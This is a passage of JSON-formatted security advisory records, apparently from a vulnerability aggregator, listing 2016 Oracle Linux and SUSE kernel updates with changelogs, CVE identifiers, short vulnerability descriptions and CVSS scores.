24655742]\n[4.1.12-61.1.8]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian Maly) [Orabug: 24618738]\n[4.1.12-61.1.7]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA regions. (Konrad Rzeszutek Wilk) [Orabug: 24566046]", "edition": 4, "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "id": "ELSA-2016-3619", "href": "http://linux.oracle.com/errata/ELSA-2016-3619.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "description": "[2.6.39-400.284.2]\n- Btrfs: fix truncation of compressed and inlined extents (Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents (Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n[2.6.39-400.284.1]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar Hotchandani) [Orabug: 22819661] \n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() (Avinash Repaka) [Orabug: 24525022] \n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) [Orabug: 24616261] ", "edition": 4, "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "id": "ELSA-2016-3618", "href": "http://linux.oracle.com/errata/ELSA-2016-3618.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", 
"CVE-2016-4998"], "description": "kernel-uek\n[3.8.13-118.11.2]\n- Btrfs: fix truncation of compressed and inlined extents (Ashish Samant) [Orabug: 22307285] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents (Divya Indi) [Orabug: 22307285] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682074] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682074] {CVE-2016-4997} {CVE-2016-4998}\n[3.8.13-118.11.1]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar Hotchandani) [Orabug: 24624195] \n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() (Avinash Repaka) [Orabug: 24655952] \n- net/mlx4: Support shutdown() interface (Gavin Shan) [Orabug: 24624181] ", "edition": 4, "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "id": "ELSA-2016-3617", "href": "http://linux.oracle.com/errata/ELSA-2016-3617.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "- [3.10.0-327.36.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.36.1]\n- [x86] Use pte_none() to test for empty PTE (Larry Woodman) [1363860 1347159]\n- [x86] Disallow running with 32-bit PTEs to work around erratum (Larry Woodman) [1363860 1347159]\n- [x86] Ignore A/D bits in pte/pmd/pud_none() (Alexander Gordeev) [1363860 1347159]\n- [x86] Move swap offset/type up in PTE to work around erratum (Alexander Gordeev) [1363860 1347159]\n- [x86] cpu/intel: Introduce macros for Intel family numbers (Steve Best) [1364074 1273778]\n[3.10.0-327.35.1]\n- Revert: [x86] cpu/intel: Introduce macros for Intel family numbers (Steve 
Best) [1364074 1273778]\n- Revert: [x86] Move swap offset/type up in PTE to work around erratum (Larry Woodman) [1363860 1347159]\n- Revert: [x86] Ignore A/D bits in pte/pmd/pud_none() (Larry Woodman) [1363860 1347159]\n- Revert: [x86] Disallow running with 32-bit PTEs to work around erratum (Larry Woodman) [1363860 1347159]\n- Revert: [x86] Use pte_none() to test for empty PTE (Larry Woodman) [1363860 1347159]\n[3.10.0-327.34.1]\n- [x86] Use pte_none() to test for empty PTE (Larry Woodman) [1363860 1347159]\n- [x86] Disallow running with 32-bit PTEs to work around erratum (Larry Woodman) [1363860 1347159]\n- [x86] Ignore A/D bits in pte/pmd/pud_none() (Larry Woodman) [1363860 1347159]\n- [x86] Move swap offset/type up in PTE to work around erratum (Larry Woodman) [1363860 1347159]\n- [x86] cpu/intel: Introduce macros for Intel family numbers (Steve Best) [1364074 1273778]\n- [net] sctp: support ipv6 nonlocal bind (Xin Long) [1363847 1355769]\n- [fs] xfs: fix duplicate buffer flag bits (Brian Foster) [1363677 1358817]\n- [fs] sunrpc: Fix races between socket connection and destroy code (Steve Dickson) [1363617 1278540]\n- [fs] sunrpc: Add helpers to prevent socket create from racing (Steve Dickson) [1363617 1270038]\n- [acpi] battery: Accelerate battery resume callback (Jeremy McNicoll) [1363611 1270522]\n- [scsi] 3w-sas: fix command completion race (Tomas Henzl) [1362040 1294538]\n- [kernel] hrtimer: Prevent remote enqueue of leftmost timers (David Bulkow) [1361020 1323752]\n- [scsi] storvsc: Size the queue depth based on the ringbuffer size (Cathy Avery) [1360161 1287040]\n- [scsi] storvsc: Increase the ring buffer size (Cathy Avery) [1360161 1287040]\n- [scsi] vmbus: Support a vmbus API for efficiently sending page arrays (Cathy Avery) [1360161 1287040]\n- [fs] ovl: verify upper dentry in ovl_remove_and_whiteout() (Miklos Szeredi) [1364384 1359829]\n- [fs] ovl: verify upper dentry before unlink and rename (Miklos Szeredi) [1360155 1341795]\n- [fs] ovl: fix 
getcwd() failure after unsuccessful rmdir (Miklos Szeredi) [1360155 1341795]\n- [base] memory: fix kernel warning during memory hotplug on ppc64 (Laurent Vivier) [1357130 1276205]\n- [fs] sunrpc: increase UNX_MAXNODENAME from 32 to __NEW_UTS_LEN bytes (Benjamin Coddington) [1356880 1315390]\n- [net] tcp: enable per-socket rate limiting of all 'challenge acks' (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: uninline tcp_oow_rate_limited() (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: make challenge acks less predictable (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] netfilter: x_tables: speed up jump target validation (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: don't reject valid target size on some architectures (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: enforce nul-terminated table name from getsockopt GET_ENTRIES (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: introduce and use xt_copy_counters_from_user (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: do compat validation via translate_table (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: xt_compat_match_from_user doesn't need a retval (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: arp_tables: simplify translate_compat_table args (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: ip6_tables: simplify translate_compat_table args (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: ip_tables: simplify translate_compat_table args (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: remove unused comefrom hookmask argument (Florian Westphal) [1364809 1318693] 
{CVE-2016-3134}\n- [net] netfilter: x_tables: validate all offsets and sizes in a rule (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: check for bogus target offset (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: check standard target size too (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: add compat version of xt_check_entry_offsets (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: assert minimum target size (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: kill check_entry helper (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: add and use xt_check_entry_offsets (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: validate targets of jumps (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: don't move to non-existent next rule (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: fix unconditional helper (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: validate e->target_offset early (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [net] netfilter: x_tables: check for size overflow (Florian Westphal) [1364809 1318693] {CVE-2016-3134}\n- [block] nvme: Add pci error handlers (David Milburn) [1350352 1288601]\n- [block] nvme: protect against simultaneous shutdown invocations (David Milburn) [1350352 1288601]\n- [block] nvme: Set affinity after allocating request queues (Frank Ramsay) [1350352 1288601]\n- [block] nvme: Fix device cleanup on initialization failure (David Milburn) [1350352 1288601]\n- [block] nvme: fix kernel memory corruption with short INQUIRY buffers (David Milburn) [1350352 1288601]\n- [net] bridge: include in6.h in if_bridge.h for struct in6_addr (Jiri Benc) [1331285 1268057]\n- [net] inet: defines IPPROTO_* needed 
for module alias generation (Jiri Benc) [1331285 1268057]\n- [net] sync some IP headers with glibc (Jiri Benc) [1331285 1268057]\n[3.10.0-327.33.1]\n- [powerpc] mm: don't do tlbie for updatepp request with NO HPTE fault (Gustavo Duarte) [1361462 1287289]\n- [mm] slub: do not drop slab_mutex for sysfs_slab_add (Larry Woodman) [1361019 1282934]\n[3.10.0-327.32.1]\n- [fs] xfs: give all workqueues rescuer threads (Brian Foster) [1359630 1298684]\n- [fs] xfs: cancel eofblocks background trimming on remount read-only (Brian Foster) [1358777 1339414]\n- [netdrv] bonding: Prevent IPv6 link local address on enslaved devices (Jarod Wilson) [1357868 1297931]\n- [kernel] ptrace: make wait_on_bit(JOBCTL_TRAPPING_BIT) in ptrace_attach() killable (Jiri Olsa) [1354285 1334503]\n[3.10.0-327.31.1]\n- [kernel] ptrace: task_clear_jobctl_trapping()->wake_up_bit() needs mb() (Daniel Bristot de Oliveira) [1354313 1350624]\n- [net] sctp: label accepted/peeled off sockets (Marcelo Leitner) [1354302 1247756]\n- [char] ipmi: Remove smi_msg from waiting_rcv_msgs list before handle_one_recv_msg() (David Arcari) [1353947 1348013]\n- [netdrv] bnx2x: don't wait for Tx completion on recovery (Michal Schmidt) [1351972 1320748]\n- [pci] aer: Clear error status registers during enumeration and restore (Prarit Bhargava) [1350304 1347459]\n[3.10.0-327.30.1]\n- [net] netfilter: bridge: Use __in6_dev_get rather than in6_dev_get in br_validate_ipv6 (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: don't leak skb in error paths (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: forward IPv6 fragmented packets (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: re-order check_hbh_len() (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: refactor frag_max_size (Paolo Abeni) [1343640 1265259]\n- [net] netfilter: bridge: really save frag_max_size between PRE and POST_ROUTING (Paolo Abeni) [1343640 1265259]\n- [net] bridge: Save frag_max_size between PRE_ROUTING and 
POST_ROUTING (Paolo Abeni) [1343640 1265259]\n[3.10.0-327.29.1]\n- [fs] fanotify: fix double free of pending permission events (Richard Guy Briggs) [1352939 1339092]\n- [fs] fsnotify: rename event handling functions (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: convert access_mutex to spinlock (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: use fanotify event structure for permission response processing (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: remove useless bypass_perm check (Richard Guy Briggs) [1352939 1339092]\n- [fs] fanotify: fix notification of groups with inode & mount marks (Miklos Szeredi) [1348828 1308393]\n- [fs] fsnotify: Allocate overflow events with proper type (Richard Guy Briggs) [1345774 1135562]\n- [fs] fanotify: Handle overflow in case of permission events (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: Fix detection whether overflow event is queued (Richard Guy Briggs) [1345774 1135562]\n- [fs] inotify: Fix reporting of cookies for inotify events (Richard Guy Briggs) [1345774 1135562]\n- [fs] fanotify: Fix use after free for permission events (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: Do not return merged event from fsnotify_add_notify_event() (Richard Guy Briggs) [1345774 1135562]\n- [fs] fanotify: Fix use after free in mask checking (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: remove pointless NULL initializers (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: remove .should_send_event callback (Richard Guy Briggs) [1345774 1135562]\n- [fs] fsnotify: do not share events between notification groups (Richard Guy Briggs) [1345774 1135562]\n- [fs] inotify: provide function for name length rounding (Richard Guy Briggs) [1345774 1135562]\n- [fs] revert 'inotify: don't add consecutive overflow events to the queue' (Richard Guy Briggs) [1345774 1135562]\n- Revert: [fs] fanotify: fix notification of groups with inode & mount marks (Miklos Szeredi) [1348828 1308393]", 
"edition": 4, "modified": "2016-09-14T00:00:00", "published": "2016-09-14T00:00:00", "id": "ELSA-2016-1847", "href": "http://linux.oracle.com/errata/ELSA-2016-1847.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "kernel-uek\n[3.8.13-118.14.1]\n- ecryptfs: forbid opening files without mmap handler (Jann Horn) [Orabug: 24971919] {CVE-2016-1583}\n- RDS: IB: fix panic with handlers running post teardown (Santosh Shilimkar) [Orabug: 24395795] ", "edition": 4, "modified": "2016-11-03T00:00:00", "published": "2016-11-03T00:00:00", "id": "ELSA-2016-3636", "href": "http://linux.oracle.com/errata/ELSA-2016-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "kernel-uek\n[4.1.12-61.1.17]\n- sched: panic on corrupted stack end (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}\n- ecryptfs: forbid opening files without mmap handler (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}\n- proc: prevent stacking filesystems on top (Jann Horn) [Orabug: 24971921] {CVE-2016-1583}", "edition": 4, "modified": "2016-11-03T00:00:00", "published": "2016-11-03T00:00:00", "id": "ELSA-2016-3635", "href": "http://linux.oracle.com/errata/ELSA-2016-3635.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:48", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "[2.6.39-400.283.2]\n- KEYS: potential uninitialized variable (Dan Carpenter) [Orabug: 24393863] {CVE-2016-4470}", "edition": 4, "modified": "2016-08-04T00:00:00", "published": 
"2016-08-04T00:00:00", "id": "ELSA-2016-3592", "href": "http://linux.oracle.com/errata/ELSA-2016-3592.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:30", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "kernel-uek\n[3.8.13-118.9.2]\n- KEYS: potential uninitialized variable (Dan Carpenter) [Orabug: 24393864] {CVE-2016-4470}", "edition": 4, "modified": "2016-08-04T00:00:00", "published": "2016-08-04T00:00:00", "id": "ELSA-2016-3591", "href": "http://linux.oracle.com/errata/ELSA-2016-3591.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:57:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "description": "The SUSE Linux Enterprise 12 kernel was updated to receive critical\n security and bugfixes.\n\n Security issue fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. 
(bsc#986362)\n\n The following non-security bugs were fixed:\n - KVM: x86: expose invariant tsc cpuid bit (v2) (bsc#971770).\n - block: do not check request size in blk_cloned_rq_check_limits()\n (bsc#972124).\n - rbd: handle OBJ_REQUEST_SG types for copyup (bsc#983394).\n - target/rbd: do not put snap_context twice (bsc#981143).\n - target/rbd: remove caw_mutex usage (bsc#981143).\n\n", "edition": 1, "modified": "2016-06-30T21:07:43", "published": "2016-06-30T21:07:43", "id": "SUSE-SU-2016:1709-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00060.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "edition": 1, "description": "The SUSE Linux Enterprise 12 GA kernel was updated to receive one critical\n security fix.\n\n Security issue fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. 
(bsc#986362)\n\n", "modified": "2016-06-30T21:09:07", "published": "2016-06-30T21:09:07", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00061.html", "id": "SUSE-SU-2016:1710-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4470"], "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n - CVE-2016-5829: Multiple heap-based buffer overflows in the\n hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux\n kernel allowed local users to cause a denial of service or possibly have\n unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2)\n HIDIOCSUSAGES ioctl call (bnc#986572).\n - CVE-2016-4997: The compat IPT_SO_SET_REPLACE setsockopt implementation\n in the netfilter subsystem in the Linux kernel allowed local users to\n gain privileges or cause a denial of service (memory corruption) by\n leveraging in-container root access to provide a crafted offset value\n that triggers an unintended decrement (bnc#986362).\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bnc#984755).\n\n The following non-security bugs were fixed:\n - RDMA/cxgb4: Configure 0B MRs to match HW implementation (bsc#909589).\n - RDMA/cxgb4: Do not hang threads forever waiting on WR replies\n (bsc#909589).\n - RDMA/cxgb4: Fix locking issue in process_mpa_request (bsc#909589).\n - RDMA/cxgb4: Handle NET_XMIT return codes (bsc#909589).\n - RDMA/cxgb4: Increase epd buff size 
for debug interface (bsc#909589).\n - RDMA/cxgb4: Limit MRs to less than 8GB for T4/T5 devices (bsc#909589).\n - RDMA/cxgb4: Serialize CQ event upcalls with CQ destruction (bsc#909589).\n - RDMA/cxgb4: Wake up waiters after flushing the qp (bsc#909589).\n - bridge: superfluous skb->nfct check in br_nf_dev_queue_xmit (bsc#982544).\n - iucv: call skb_linearize() when needed (bnc#979915, LTC#141240).\n - kabi: prevent spurious modversion changes after bsc#982544 fix\n (bsc#982544).\n - mm/swap.c: flush lru pvecs on compound page arrival (bnc#983721).\n - mm: Fix DIF failures on ext3 filesystems (bsc#971030).\n - net/qlge: Avoids recursive EEH error (bsc#954847).\n - netfilter: bridge: Use __in6_dev_get rather than in6_dev_get in\n br_validate_ipv6 (bsc#982544).\n - netfilter: bridge: do not leak skb in error paths (bsc#982544).\n - netfilter: bridge: forward IPv6 fragmented packets (bsc#982544).\n - qeth: delete napi struct when removing a qeth device (bnc#979915,\n LTC#143590).\n - s390/mm: fix asce_bits handling with dynamic pagetable levels\n (bnc#979915, LTC#141456).\n - s390/pci: fix use after free in dma_init (bnc#979915, LTC#141626).\n - s390: fix test_fp_ctl inline assembly contraints (bnc#979915,\n LTC#143138).\n - sched/cputime: Fix clock_nanosleep()/clock_gettime() inconsistency\n (bnc#988498).\n - sched/cputime: Fix cpu_timer_sample_group() double accounting\n (bnc#988498).\n - sched: Provide update_curr callbacks for stop/idle scheduling classes\n (bnc#988498).\n - x86/mm/pat, /dev/mem: Remove superfluous error message (bsc#974620).\n\n", "edition": 1, "modified": "2016-08-09T21:09:10", "published": "2016-08-09T21:09:10", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00027.html", "id": "SUSE-SU-2016:2018-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:12", 
"bulletinFamily": "unix", "cvelist": ["CVE-2016-4794", "CVE-2016-5829", "CVE-2016-4997", "CVE-2016-4470"], "description": "The openSUSE Leap 42.1 was updated to 4.1.27 to receive various security\n and bugfixes.\n\n The following security bugs were fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n - CVE-2016-5829: Multiple heap-based buffer overflows in the\n hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux\n kernel allow local users to cause a denial of service or possibly have\n unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2)\n HIDIOCSUSAGES ioctl call (bnc#986572).\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bnc#984755).\n - CVE-2016-4794: Use-after-free vulnerability in mm/percpu.c in the Linux\n kernel allowed local users to cause a denial of service (BUG)\n or possibly have unspecified other impact via crafted use of the mmap\n and bpf system calls (bnc#980265).\n\n The following non-security bugs were fixed:\n - Refresh patches.xen/xen-netback-coalesce: Restore copying of SKBs with\n head exceeding page size (bsc#978469).\n - Refresh patches.xen/xen3-patch-2.6.26 (fix PAT initialization).\n - Refresh patches.xen/xen3-patch-2.6.39 (fix ia32_compat inheritance).\n - Refresh patches.xen/xen3-patch-3.14: Suppress atomic file position\n updates for /proc/xen/xenbus (bsc#970275).\n - Refresh patches.xen/xen3-patch-3.16 (drop redundant addition of a\n comment).\n - Refresh patches.xen/xen3-patch-4.1.7-8.\n - base: make module_create_drivers_dir race-free (bnc#983977).\n - ipvs: count pre-established TCP states as active (bsc#970114).\n - net: thunderx: Fix TL4 configuration for 
secondary Qsets (bsc#986530).\n - net: thunderx: Fix link status reporting (bsc#986530).\n\n", "edition": 1, "modified": "2016-07-14T14:08:15", "published": "2016-07-14T14:08:15", "id": "OPENSUSE-SU-2016:1798-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00014.html", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:18:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1583"], "description": "The SUSE Linux Enterprise 12 GA kernel was updated to fix one security\n issue.\n\n The following security bug was fixed:\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does\n not allow it. This could have led to local privilege escalation when\n ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n", "edition": 1, "modified": "2016-06-16T15:07:58", "published": "2016-06-16T15:07:58", "id": "SUSE-SU-2016:1596-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00027.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:35:13", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "edition": 1, "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n\n", "modified": "2016-08-09T17:17:48", "published": "2016-08-09T17:17:48", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00012.html", "id": "SUSE-SU-2016:1998-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4470"], "description": "This update for the Linux Kernel 3.12.60-52_49 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n\n", "edition": 1, "modified": "2016-08-09T17:18:11", "published": "2016-08-09T17:18:11", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00013.html", "id": "SUSE-SU-2016:1999-1", "title": "Security update for Linux Kernel Live Patch 14 for SLE 12 (important)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:42", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.57-60_35 fixes several issues.\n\n These security issues were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial 
of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n", "edition": 1, "modified": "2016-08-09T17:18:31", "published": "2016-08-09T17:18:31", "id": "SUSE-SU-2016:2000-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00014.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 4 for SLE 12 SP1 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3134", "CVE-2016-4997", "CVE-2016-4998"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nThe kernel-rt packages have been upgraded to version 3.10.0-327.rt56.197, which provides a number of bug fixes 
